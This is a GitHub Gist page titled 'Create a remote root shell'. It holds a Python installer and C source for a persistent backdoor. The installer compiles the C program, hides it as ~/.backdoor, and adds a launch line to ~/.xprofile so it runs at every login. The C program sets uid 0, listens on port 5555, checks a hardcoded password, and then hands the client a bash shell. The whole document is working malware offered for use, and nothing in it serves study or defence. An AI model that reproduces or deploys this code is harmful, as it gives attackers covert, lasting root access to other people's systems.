Skip to content

Instantly share code, notes, and snippets.

@brickgao
Last active July 12, 2016 14:41
Show Gist options
  • Save brickgao/3c192c9c8480197b3586f60a7350d37a to your computer and use it in GitHub Desktop.
Save brickgao/3c192c9c8480197b3586f60a7350d37a to your computer and use it in GitHub Desktop.
Create a remote root shell
#!/usr/bin/env python2
import os
import shutil
if __name__ == "__main__":
os.popen("sudo gcc backdoor.c -o .backdoor")
shutil.move(".backdoor", os.path.expanduser("~/.backdoor"))
with open(os.path.expanduser("~/.xprofile"), "a+") as f:
f.write("nohup ~/.backdoor &")
os.popen("nohup ~/.backdoor &")
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define HOST_PORT 5555
#define LENGTH_OF_LISTEN_QUEUE 20
int main() {
struct sockaddr_in server_addr;
int sockfd = socket(AF_INET, SOCK_STREAM, 0);
char ask_password[] = "PASSWORD: ", buffer[500], password[9] = "TEST1234";
setuid(0);
bzero(&server_addr, sizeof(server_addr));
server_addr.sin_family = AF_INET;
server_addr.sin_addr.s_addr = htonl(INADDR_ANY);
server_addr.sin_port = htons(HOST_PORT);
bind(sockfd, (struct sockaddr *)&server_addr, sizeof(server_addr));
listen(sockfd, LENGTH_OF_LISTEN_QUEUE);
while (1) {
int pid = -1, buff_len = -1;
struct sockaddr_in client_addr;
socklen_t addr_len = sizeof(client_addr);
int client_sockfd = accept(sockfd, (struct sockaddr *)&client_addr, &addr_len);
if ((pid = fork()) == 0) {
buff_len = write(client_sockfd, ask_password, sizeof(ask_password));
if (buff_len < 0) exit(0);
buff_len = read(client_sockfd, buffer, 255);
if (buff_len < 0) exit(0);
buffer[buff_len - 1] = '\0';
if (strcmp(buffer, password) == 0) {
buff_len = write(client_sockfd, "WELCOME\n", 8);
dup2(client_sockfd, 0);
dup2(client_sockfd, 1);
dup2(client_sockfd, 2);
execlp("/bin/bash", "/bin/bash", NULL);
}
exit(0);
}
else {
close(client_sockfd);
}
}
return 0;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment